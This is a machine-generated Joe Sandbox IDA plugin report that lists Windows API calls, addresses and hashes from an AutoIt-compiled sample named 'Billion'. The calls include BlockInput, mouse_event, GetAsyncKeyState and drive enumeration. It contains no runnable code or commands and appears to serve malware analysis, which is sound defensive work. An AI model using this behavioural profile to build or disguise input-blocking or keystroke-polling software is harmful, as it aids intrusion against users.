                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: BlockInput
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 10534a97afd2a076c1b00b68f97d9e1bb8597bef0beafd4ff5f39c698e32107a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 23b81463d3edb903e7fc2ddc4f77ed1b7a089678b9e2406d974ff5a711989f8b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10534a97afd2a076c1b00b68f97d9e1bb8597bef0beafd4ff5f39c698e32107a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AE048762003149FD710AF69D405E56FBD8AFA5761F018429F849D7351D770F941CB94
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0019EC95
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: mouse_event
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2434400541-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 18dde75b4aa928b57e935d09dcd350ad151feea4da71dc79753e614b498b2204
                                                                                                                                                                                                                                                                                                          • Instruction ID: fee709c89154719da76d7dc6bcec657521d98860861854c882271f81ee3ef324
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18dde75b4aa928b57e935d09dcd350ad151feea4da71dc79753e614b498b2204
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31D05EB61903007AEC1CCA3CDF2FF360A89E302761F804349F182D5595E7C199409123
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0015075E), ref: 00150D4A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 95147e4ae1a6a320bf48740b686f754e8c28fa92e8734e511c1f2e63a38ef136
                                                                                                                                                                                                                                                                                                          • Instruction ID: e5e9d6fd7619dd92f2c18331743b8ff1f35cdc9dc34f17a1b7a1d83251d47fcc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95147e4ae1a6a320bf48740b686f754e8c28fa92e8734e511c1f2e63a38ef136
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001B358D
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001B35A0
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 001B35AF
                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 001B35CA
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 001B35D1
                                                                                                                                                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 001B3700
                                                                                                                                                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 001B370E
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B3755
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 001B3761
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 001B379D
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B37BF
                                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B37D2
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B37DD
                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 001B37E6
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B37F5
                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 001B37FE
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B3805
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 001B3810
                                                                                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B3822
                                                                                                                                                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,001D0C04,00000000), ref: 001B3838
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 001B3848
                                                                                                                                                                                                                                                                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 001B386E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 001B388D
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B38AF
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001B3A9C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                          • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                                          • Opcode ID: c7a684e2030658e26ced2932eeac046721c829565f138d2c21635fcd442b5d0f
                                                                                                                                                                                                                                                                                                          • Instruction ID: a7e17ad9104147f21df0fe4d1b59364d0e18da7ad44abdb94d14c3678c2d9979
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7a684e2030658e26ced2932eeac046721c829565f138d2c21635fcd442b5d0f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB027C72900215EFDB14DF64DC89EAE7BB9FB48314F048168F915AB2A1CB74EE45CB60
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?,?), ref: 001316B4
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00172B07
                                                                                                                                                                                                                                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00172B40
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00172F85
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00131488,?,00000000,?,?,?,?,0013145A,00000000,?), ref: 00131865
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001053), ref: 00172FC1
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00172FD8
                                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00172FEE
                                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00172FF9
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                                          • String ID: 0$( $( $(
                                                                                                                                                                                                                                                                                                          • API String ID: 2760611726-4072025856
                                                                                                                                                                                                                                                                                                          • Opcode ID: 70bedf3f36aa9ceb6a1ed8794b5f7bcccbcdd0c3ac10b072f270168e607dcead
                                                                                                                                                                                                                                                                                                          • Instruction ID: a38eb957c08d99f66947311dd67abe96619e71dc7b4d8d4244171459a75541d9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70bedf3f36aa9ceb6a1ed8794b5f7bcccbcdd0c3ac10b072f270168e607dcead
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1112BE70204241EFC729CF54D889BA9BBF5FB54300F288569F4999B662CB71EC87CB91
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 001C7B67
                                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 001C7B98
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 001C7BA4
                                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 001C7BBE
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 001C7BCD
                                                                                                                                                                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 001C7BF8
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000010), ref: 001C7C00
                                                                                                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 001C7C07
                                                                                                                                                                                                                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 001C7C16
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001C7C1D
                                                                                                                                                                                                                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 001C7C68
                                                                                                                                                                                                                                                                                                          • FillRect.USER32(?,?,?), ref: 001C7C9A
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C7CBC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: GetSysColor.USER32(00000012), ref: 001C7E5B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: SetTextColor.GDI32(?,001C7B2D), ref: 001C7E5F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: GetSysColorBrush.USER32(0000000F), ref: 001C7E75
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: GetSysColor.USER32(0000000F), ref: 001C7E80
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: GetSysColor.USER32(00000011), ref: 001C7E9D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001C7EAB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: SelectObject.GDI32(?,00000000), ref: 001C7EBC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: SetBkColor.GDI32(?,?), ref: 001C7EC5
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: SelectObject.GDI32(?,?), ref: 001C7ED2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 001C7EF1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001C7F08
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001C7E22: GetWindowLongW.USER32(?,000000F0), ref: 001C7F15
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 664c34b4c357b9f9ec924a9aa64303036b8f9f3036009f6ab7c64d075324e1be
                                                                                                                                                                                                                                                                                                          • Instruction ID: 85d1f3c150ae730cbc81cf612ee3173f3347dfb86772a1471f549c665d9041cb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 664c34b4c357b9f9ec924a9aa64303036b8f9f3036009f6ab7c64d075324e1be
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60A15B72008302AFDB119F64EC48F6BBBA9FB48325F144A2DF962965E0D771D984CF52
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 001B319B
                                                                                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001B32C7
                                                                                                                                                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001B3306
                                                                                                                                                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001B3316
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 001B335D
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 001B3369
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 001B33B2
                                                                                                                                                                                                                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001B33C1
                                                                                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 001B33D1
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 001B33D5
                                                                                                                                                                                                                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 001B33E5
                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001B33EE
                                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 001B33F7
                                                                                                                                                                                                                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001B3423
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 001B343A
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 001B347A
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 001B348E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 001B349F
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 001B34D4
                                                                                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 001B34DF
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001B34EA
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 001B34F4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                                          • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                                          • Opcode ID: ffb2a3e0f922fe1f27249269c92ee58bfcbba53cf4f84dc8d9b3219a5d752d5e
                                                                                                                                                                                                                                                                                                          • Instruction ID: c31756b854db5707c3d2436718f6cfa4f0e9db766db5935ab3aee89d3bfe3a26
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffb2a3e0f922fe1f27249269c92ee58bfcbba53cf4f84dc8d9b3219a5d752d5e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61B15071A00215AFEB14DFA8DC49FAEBBB9EB48710F008159FA15E7291DB74ED40CB94
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 001A5532
                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,001CDC30,?,\\.\,001CDCD0), ref: 001A560F
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,001CDC30,?,\\.\,001CDCD0), ref: 001A577B
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                                          • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                                          • Opcode ID: c2ef234d9c257a06a5e1dec1bc3fa45078e39d012c3df19ec9db5fc52681f8f3
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5d35fa14d58eb2180280f2f48f6e0e44a9dfe6c49013a8e1090ff25f91b1bcef
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2ef234d9c257a06a5e1dec1bc3fa45078e39d012c3df19ec9db5fc52681f8f3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5610638A0CA09DFC728DFA4C992D7877B3EF26364BA58015E40ABB292D731DD41DB51
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001325F8
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00132600
                                                                                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0013262B
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00132633
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00132658
                                                                                                                                                                                                                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00132675
                                                                                                                                                                                                                                                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00132685
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001326B8
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001326CC
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 001326EA
                                                                                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00132706
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00132711
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: GetCursorPos.USER32(?), ref: 001319E1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: ScreenToClient.USER32(00000000,?), ref: 001319FE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: GetAsyncKeyState.USER32(00000001), ref: 00131A23
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001319CD: GetAsyncKeyState.USER32(00000002), ref: 00131A3D
                                                                                                                                                                                                                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,0013199C), ref: 00132738
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                                          • String ID: <) $<) $AutoIt v3 GUI$( $( $(
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 001C1BC4
                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 001C1BD9
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 001C1BE0
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C1C35
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 001C1C55
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001C1C89
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001C1CA7
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001C1CB9
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 001C1CCE
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 001C1CE1
                                                                                                                                                                                                                                                                                                          • IsWindowVisible.USER32(00000000), ref: 001C1D3D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001C1D58
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001C1D6C
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 001C1D84
                                                                                                                                                                                                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 001C1DAA
                                                                                                                                                                                                                                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 001C1DC4
                                                                                                                                                                                                                                                                                                          • CopyRect.USER32(?,?), ref: 001C1DDB
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 001C1E46
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
